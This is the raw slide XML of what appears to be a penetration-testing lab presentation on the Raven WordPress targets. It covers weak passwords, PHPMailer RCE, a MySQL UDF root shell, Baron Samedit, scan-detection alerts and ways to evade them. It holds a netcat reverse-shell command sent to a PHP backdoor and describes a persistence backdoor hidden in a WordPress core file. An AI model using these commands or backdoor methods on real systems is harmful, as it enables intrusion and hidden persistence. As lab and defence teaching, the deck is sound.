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7" r:id="rId5"/>
    <p:sldMasterId id="2147483728" r:id="rId6"/>
    <p:sldMasterId id="214748372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13716000" cx="24377650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Amatic SC"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId69"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light"/>
      <p:regular r:id="rId70"/>
      <p:bold r:id="rId71"/>
      <p:italic r:id="rId72"/>
      <p:boldItalic r:id="rId73"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium"/>
      <p:regular r:id="rId74"/>
      <p:bold r:id="rId75"/>
      <p:italic r:id="rId76"/>
      <p:boldItalic r:id="rId77"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId78"/>
      <p:bold r:id="rId79"/>
      <p:italic r:id="rId80"/>
      <p:boldItalic r:id="rId81"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue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691887-5AB8-466B-A025-E6DA13E93E20}">
  <a:tblStyle styleId="{75691887-5AB8-466B-A025-E6DA13E93E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HelveticaNeue-italic.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-bold.fntdata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85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-boldItalic.fntdata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RobotoLight-italic.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-regular.fntdata"/><Relationship Id="rId81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Thin-regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId49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LatoLight-boldItalic.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-italic.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-boldItalic.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-bold.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight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AmaticSC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2.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-regular.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AmaticSC-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins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Poppins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Thin-boldItalic.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular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Italic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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cdfdb2ec29_0_8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cdfdb2ec2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d356f5674b_0_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d356f567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cdfdb2ec29_0_9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cdfdb2ec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cdfdb2ec29_0_10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cdfdb2ec2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ce0281d4ca_0_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ce0281d4c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cdfdb2ec29_0_6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cdfdb2ec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cdfdb2ec29_0_7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cdfdb2ec2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ce0281d4ca_0_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ce0281d4c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dfdb2ec29_0_8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dfdb2ec2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ce0281d4ca_0_1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ce0281d4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ce0281d4ca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ce0281d4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d356f5674b_0_3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d356f567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d356f5674b_0_1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d356f567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d356f5674b_0_5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d356f5674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d356f5674b_0_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d356f5674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d356f5674b_0_6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d356f5674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d356f5674b_0_7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d356f5674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d356f5674b_0_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d356f5674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8bd883d690_5_514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8bd883d690_5_5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8bd883d690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8bd883d6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d356f5674b_0_8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d356f567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d2ed493c6a_2_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d2ed493c6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cdfdb2ec29_0_6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cdfdb2ec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d356f5674b_0_9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d356f5674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cdfdb2ec29_0_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cdfdb2ec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dfdb2ec29_0_2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dfdb2ec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cdfdb2ec29_0_3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cdfdb2ec2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cdfdb2ec29_0_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cdfdb2ec2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cdfdb2ec29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cdfdb2ec2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3.png"/><Relationship Id="rId4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3.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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95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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101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2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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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3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8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38079"/>
            <a:ext cx="24377649" cy="9300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CWE-200 - Exposure of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;139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8" name="Google Shape;1398;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="1099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On Target 1, viewing HTML source in Firefox, reveals Flag 1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CWE-200 - Exposure of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404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5" name="Google Shape;1405;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="1937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On both targets, WPscan reveals Wordpress usernames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Provides an attacker usernames to use during password brute force attacks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06" name="Google Shape;140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2800"/>
            <a:ext cx="24377651" cy="884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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412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3" name="Google Shape;141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712750"/>
            <a:ext cx="19925160" cy="115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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419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20" name="Google Shape;142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50" y="1720700"/>
            <a:ext cx="11599824" cy="113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6375" y="9118641"/>
            <a:ext cx="11599825" cy="3984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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11177475" y="2295400"/>
            <a:ext cx="14485800" cy="7078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Michael’s account can read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/var/www/html/wordpress/wp-config.php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has Wordpress database credentials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rgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(which happen to be the root MySQL user)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select, read, write and delete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 any data we want now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Flag 3 and Flag 4)</a:t>
            </a:r>
            <a:endParaRPr sz="4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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428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9" name="Google Shape;1429;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="241569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Michael’s SSH password is the same as his username and easily guessed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Steven’s SSH and Wordpress password is weak and easily cracked with John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These credentials allow an attacker to access an SSH shell as either user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Seven’s credentials allow an attacker to access Wordpress admin - view all posts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30" name="Google Shape;14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800" y="6753225"/>
            <a:ext cx="24377651" cy="5491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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Google Shape;1436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7" name="Google Shape;143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651800"/>
            <a:ext cx="22281631" cy="115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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1443" name="Google Shape;1443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325" y="1716525"/>
            <a:ext cx="18667075" cy="114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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="249615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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450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1" name="Google Shape;145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8000"/>
            <a:ext cx="24377649" cy="1109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CWE-548: Exposure Through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Google Shape;1457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8" name="Google Shape;145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728000"/>
            <a:ext cx="17290800" cy="91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9445000"/>
            <a:ext cx="19074526" cy="3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00"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20415000" y="8675375"/>
            <a:ext cx="2833500" cy="408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CVE-2016-10033 - PHPMailer RCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Google Shape;1466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7" name="Google Shape;1467;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="26958600" cy="1247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Script, drops a PHP backdoor on the target, allowing shell commands as www-data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68" name="Google Shape;146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750" y="3543100"/>
            <a:ext cx="22577701" cy="95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25" name="Google Shape;1325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6" name="Google Shape;1326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28" name="Google Shape;1328;p8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1329" name="Google Shape;1329;p8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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p8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Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p8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Maintaining Access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CVE-2016-10033 - PHPMailer RCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Google Shape;147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5" name="Google Shape;1475;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355925" y="2286750"/>
            <a:ext cx="29741100" cy="1906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raven.local/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20%2Fbin%2Fbash</a:t>
            </a:r>
            <a:endParaRPr sz="4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476" name="Google Shape;147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75" y="3350875"/>
            <a:ext cx="22795701" cy="9766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03"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32801" y="0"/>
            <a:ext cx="259602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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482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3" name="Google Shape;148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25" y="1713475"/>
            <a:ext cx="17417506" cy="113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03"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69150" y="3405475"/>
            <a:ext cx="8167500" cy="2601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Compiling and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linking the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dynamic library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from source code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04"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32801" y="0"/>
            <a:ext cx="259602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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490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1" name="Google Shape;149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325" y="1715175"/>
            <a:ext cx="14837224" cy="114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04"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69150" y="3405475"/>
            <a:ext cx="8167500" cy="765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Moving the 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library to the required folder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the user defined SQL function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Calling the function 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get a reverse shell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 root user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05"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32801" y="0"/>
            <a:ext cx="259602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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498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9" name="Google Shape;149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100" y="1724950"/>
            <a:ext cx="11976100" cy="11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05"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="3405475"/>
            <a:ext cx="10035300" cy="765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Receiving the reverse shell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 Flag 4</a:t>
            </a:r>
            <a:b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Accessing /etc/shadow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06"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32801" y="0"/>
            <a:ext cx="259602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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CVE-2021-3156 - Baron Samedit Sudo Exploit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7" name="Google Shape;150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00" y="7758140"/>
            <a:ext cx="22858874" cy="531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88" y="3923250"/>
            <a:ext cx="22858875" cy="1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06"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="2548900"/>
            <a:ext cx="22177500" cy="120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test returns a Segmentation Fault if Sudo is vulnerable to Baron Samedit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1510" name="Google Shape;1510;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="6485850"/>
            <a:ext cx="22728900" cy="1201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Metasploit exploit failed with compiler error message requiring additional option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0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17" name="Google Shape;1517;p10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10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5" name="Google Shape;152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6948" y="0"/>
            <a:ext cx="5900705" cy="137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50" y="4205000"/>
            <a:ext cx="18090924" cy="89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08"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="19491600" cy="1909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Count unique ports accessed on destination IP, by source IP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Threshold &gt;= 60, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within 1 minute</a:t>
            </a:r>
            <a:endParaRPr sz="4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4" name="Google Shape;1534;p10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35" name="Google Shape;153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2" name="Google Shape;1542;p11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43" name="Google Shape;154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9" name="Google Shape;1549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0" name="Google Shape;1550;p111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51" name="Google Shape;155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8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38" name="Google Shape;1338;p8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9" name="Google Shape;1339;p8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7" name="Google Shape;1557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8" name="Google Shape;1558;p11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59" name="Google Shape;155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Port Scan Monitor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6" name="Google Shape;1566;p11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can attempt to avoid detection using the -T option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Tested with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap -v -p- -T1 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1567" name="Google Shape;156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99493"/>
            <a:ext cx="24377651" cy="65467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13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12326225" y="8409400"/>
            <a:ext cx="3469200" cy="540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3" name="Google Shape;157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2303" y="0"/>
            <a:ext cx="6405341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- URI Scan Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1575" name="Google Shape;1575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6" name="Google Shape;1576;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="35754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Count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP status &gt;= 400, by source IP, by destination IP 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Threshold &gt;= 400, within 5 minutes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577" name="Google Shape;157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75" y="6063482"/>
            <a:ext cx="17672250" cy="703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Google Shape;158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8302" y="6174000"/>
            <a:ext cx="11954924" cy="657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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URI Scan Monitor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5" name="Google Shape;1585;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="3402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No stealth option in Gobuster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Writing a Python script to do this slowly would be quite easy (very slow to run!)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Evil blackhats with a botnet could do a distributed attack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 VPNs to keep changing IP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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rgbClr val="3D85C6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rgbClr val="3D85C6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate distributed?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An alert that counts unique URIs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>causing 404 errors, by destination IP</a:t>
            </a:r>
            <a:endParaRPr sz="4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1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92" name="Google Shape;1592;p116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Maintaining Access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3" name="Google Shape;1593;p116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Backdooring the Target</a:t>
            </a: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999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1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0" name="Google Shape;1600;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="107616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Reverse shell as root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It’s in this screenshot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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you see it?</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="44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01" name="Google Shape;160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900" y="1713450"/>
            <a:ext cx="14634300" cy="113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Backdooring the Target</a:t>
            </a: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999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1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8" name="Google Shape;1608;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="107616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Reverse shell as root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rgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp-blog-footer.php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hidden amongst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Wordpress core code</a:t>
            </a:r>
            <a:endParaRPr i="1"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09" name="Google Shape;160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900" y="1713450"/>
            <a:ext cx="14634300" cy="113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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19253150" y="5905125"/>
            <a:ext cx="3882600" cy="44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Backdooring the Target</a:t>
            </a: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999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2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7" name="Google Shape;1617;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="229428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Recieves a base64 encoded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SQL query, via an HTTP post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Parses the Wordpress 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database credentials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from wp-config.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400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Connects to the Wordpress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database and executes SQL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18" name="Google Shape;161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394" y="1731625"/>
            <a:ext cx="14490906" cy="119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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32900" y="9753150"/>
            <a:ext cx="24443100" cy="3339000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
